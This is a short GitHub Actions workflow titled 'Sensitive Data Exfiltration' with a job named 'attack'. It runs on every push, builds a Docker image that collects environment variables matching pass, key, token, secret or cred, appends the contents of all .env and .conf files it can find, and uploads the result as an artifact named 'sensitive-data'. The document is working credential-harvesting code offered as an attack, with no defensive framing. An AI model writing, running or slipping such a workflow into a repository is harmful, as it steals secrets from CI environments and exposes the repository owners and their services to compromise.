name: Sensitive Data Exfiltration
on: push

jobs:
  attack:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Build and Exfiltrate
        run: |
          # Create malicious Dockerfile
          echo -e "FROM alpine\nRUN echo 'Hunting...' && (env | grep -iE 'pass|key|token|secret|cred') > /secrets.txt && find / \\( -name '*.env' -o -name '*.conf' \\) -exec cat {} \\; >> /secrets.txt 2>/dev/null" > Dockerfile

          # Build image and extract data
          docker build -t secrets .
          docker run --rm secrets cat /secrets.txt > leaked_secrets.txt

      - name: Upload Secrets
        uses: actions/upload-artifact@v4
        with:
          name: sensitive-data
          path: leaked_secrets.txt
